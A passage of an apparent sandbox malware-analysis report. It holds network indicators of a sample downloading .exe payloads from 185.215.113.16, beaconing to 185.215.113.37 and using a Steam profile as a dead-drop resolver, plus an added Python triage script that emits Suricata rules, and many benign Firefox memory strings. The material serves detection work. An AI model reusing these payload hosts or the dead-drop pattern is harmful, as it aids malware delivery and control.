    Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1
    Host: detectportal.firefox.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cache-Control: no-cache
    Pragma: no-cache
    Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1
    Host: detectportal.firefox.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
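The HTTP requests listed above fall into three groups: the probes to detectportal.firefox.com, which are Firefox's own captive-portal check from the sandbox image rather than sample activity; the fetches of *.exe payloads from the literal-IP host 185.215.113.16 and the bare GET / requests to 185.215.113.37, several of which carry no User-Agent header at all (a Host header that is a raw IP is also why the report logs "TCP traffic detected without corresponding DNS query" for the same address); and the lookup of a steamcommunity.com profile page, a location stealer families use as a dead-drop resolver, where the profile name rather than the page carries the real C2 address. The Python below is an added example, not part of this report and not code from any of the detected families: it parses raw HTTP requests, tags each with those traits, groups the result by host, and emits a Suricata rule for every executable fetched from a literal-IP host. The sample requests are constructed to mirror the ones listed and are not captured traffic; BENIGN_HOSTS, the tag names, the payload-extension list and the SID range are assumptions chosen for the example.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample input: raw HTTP requests written by hand to mirror the
# hosts, paths and header shapes the report lists. Not captured traffic.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FIREFOX_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) "
              "Gecko/20100101 Firefox/118.0")

SAMPLE_REQUESTS = [
    "GET /profiles/76561199724331900 HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {CHROME_UA}\r\nHost: steamcommunity.com\r\n\r\n",
    "GET /mine/random.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {CHROME_UA}\r\nHost: 185.215.113.16\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 185.215.113.37\r\nConnection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /luma/random.exe HTTP/1.1\r\nHost: 185.215.113.16\r\n\r\n",
    "GET /canonical.html HTTP/1.1\r\nHost: detectportal.firefox.com\r\n"
    f"User-Agent: {FIREFOX_UA}\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n",
]

# Assumption: hosts the stock sandbox image contacts on its own. The Firefox
# captive-portal probe is the one present in this report.
BENIGN_HOSTS = {"detectportal.firefox.com"}

# Assumption: extensions treated as a payload fetch.
PAYLOAD_EXT = re.compile(r"\.(exe|dll|ps1|bat|cmd|vbs|js|msi)$", re.IGNORECASE)


@dataclass
class Request:
    method: str
    path: str
    headers: dict  # names lower-cased; a repeated header keeps its last value


def parse_request(raw: str) -> Request:
    """Parse the request line and headers of one raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def host_is_raw_ip(host: str) -> bool:
    """True when the Host header is a literal IP address (IPv4 ':port' dropped)."""
    bare = host.split(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(bare)
        return True
    except ValueError:
        return False


def triage(req: Request) -> list:
    """Tag one request with the traits that make the listed requests stand out."""
    host = req.headers.get("host", "")
    if host in BENIGN_HOSTS:
        return ["benign-browser-probe"]
    tags = []
    if host_is_raw_ip(host):
        # No DNS lookup precedes this connection: the same trait the sandbox
        # reports as "TCP traffic detected without corresponding DNS query".
        tags.append("raw-ip-host")
    if "user-agent" not in req.headers:
        # Browsers and nearly every legitimate HTTP client send a User-Agent.
        tags.append("no-user-agent")
    if PAYLOAD_EXT.search(req.path):
        tags.append("executable-download")
    if (req.path == "/" and host_is_raw_ip(host)
            and req.headers.get("cache-control", "").lower() == "no-cache"):
        tags.append("beacon-like")
    if host == "steamcommunity.com" and req.path.startswith("/profiles/"):
        # Dead-drop resolver pattern: the profile name carries the next address.
        tags.append("steam-profile-lookup")
    return tags


def summarize(raw_requests) -> dict:
    """Group triage results as host -> path -> tags, dropping benign probes."""
    summary = defaultdict(dict)
    for raw in raw_requests:
        req = parse_request(raw)
        tags = triage(req)
        if tags == ["benign-browser-probe"]:
            continue
        summary[req.headers.get("host", "")][req.path] = tags
    return dict(summary)


def suricata_rules(summary: dict, sid_base: int = 9000000) -> list:
    """One Suricata rule per executable fetched from a literal-IP host.
    sid_base is an arbitrary local-range starting SID (assumption)."""
    rules = []
    for host, paths in sorted(summary.items()):
        for path, tags in sorted(paths.items()):
            if "executable-download" not in tags or "raw-ip-host" not in tags:
                continue
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Payload fetch '
                f'{host}{path}"; flow:established,to_server; http.method; content:"GET"; '
                f'http.host; content:"{host}"; http.uri; content:"{path}"; '
                f'classtype:trojan-activity; sid:{sid_base + len(rules)}; rev:1;)')
    return rules


if __name__ == "__main__":
    result = summarize(SAMPLE_REQUESTS)
    for host, paths in result.items():
        for path, tags in paths.items():
            print(f"{host}{path}: {', '.join(tags)}")
    print("\n".join(suricata_rules(result)))
```

Requests exported from a pcap (a follow-stream dump, or the request text a sandbox shows per connection) can be fed to summarize() unchanged. The no-User-Agent check is deliberately strict because the Host-only requests in this report are exactly the ones a browser would never produce; the rules pin both http.host and http.uri so a redeploy of the same paths on a new IP does not match silently and has to be re-derived from new traffic.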
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || :strippedURL AND :prefix || :strippedURL || X'FFFF'UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: - the given reason to update is not supportedKEY_PLUGIN_LAST_INSTALL_FAIL_REASONuninstallPlugin() - unregistering gmp directory media.gmp-manager.secondsBetweenChecksipc:first-content-process-createdonPrefEnabledChanged() - adding gmp directory media.gmp-manager.cert.checkAttributessitepermsaddon-provider-registereddom.sitepermsaddon-provider.enabledfindUpdates() - updateTask succeeded for startup - adding clearkey CDM directory findUpdates() - found update for This should only be called from XPCShell testsresource://gre/modules/amManager.sys.mjsresource://gre/modules/UpdateUtils.sys.mjsmedia.gmp-manager.cert.requireBuiltInresource://gre/modules/AddonManager.sys.mjsspeculativeConnectWithOriginAttributesresource://gre/modules/AddonManager.sys.mjsaddGatedPermissionTypesForXpcShellTestsonPrefEnabledChanged() - removing gmp directory startup - adding gmp directory failed with media.gmp-manager.checkContentSignatureThis should only be called from XPCShell testsstartup - adding clearkey CDM failedonPrefEMEGlobalEnabledChanged() id=media.{0}.allow-x64-plugin-on-arm64SitePermsAddonInstall#cancel called twice on KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASON@mozilla.org/spellchecker/user;1pictureinpicture%40mozilla.org:1.0.0*://*.imgur.io/js/vendor.*.bundle.jswebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/network/file-output-stream;1FileUtils_closeAtomicFileOutputStreamFileUtils_closeSafeFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://auth.9c9media.ca/auth/main.js*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/addons/XPIProvider.jsm*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js*resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.js*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js**://media.richrelevance.com/rrserver/js/1.2/p13n.js*://www.gstatic.com/firebasejs/*/firebase-messaging.js* equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*xml_vmap1**://pubads.g.doubleclick.net/gampad/*xml_vmap2**://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/imp/*@mozilla.org/addons/content-policy;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2897777583.000002EE5E7DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @identity-credential-header-icon-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/network/protocol;1?name=defaultFailed to listen. Listener already attached.devtools/client/framework/devtools-browserNo callback set for this channel.@mozilla.org/network/protocol;1?name=fileresource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: @mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPresource://devtools/shared/security/socket.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAGS_MAKE_ALTERNATE_URIUnable to start devtools server on Got invalid request to save JSON data^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools/client/framework/devtoolsdevtools.performance.popup.feature-flagDevToolsStartup.jsm:handleDebuggerFlagdevtools.performance.recording.ui-base-urldevtools.debugger.remote-websocket@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}JSON Viewer's onSave failed in startPersistence@mozilla.org/uriloader/web-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://www.inbox.lv/rfc2368/?value=%shttps://poczta.interia.pl/mh/?mailto=%sScheme should be either http or httpsgecko.handlerService.defaultHandlersVersionresource://gre/modules/DeferredTask.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1isDownloadsImprovementsAlreadyMigratedresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjsextractScheme/fixupChangedProtocol<handlerSvc fillHandlerInfo: don't know this typeMust have a source and a callback@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1@mozilla.org/network/async-stream-copier;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/intl/converter-input-stream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sVALIDATE_DONT_COLLAPSE_WHITESPACENon-zero amount of bytes must be specifiedhttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/handler-service;1newChannel requires a single object argument@mozilla.org/uriloader/handler-service;1First argument should be an nsIInputStreamhttps://ma
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4ea6ad161ff4b3c461cb1321; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 15:52:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b5c6540cea8b0a22519f81b6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 15:51:46 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HX8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
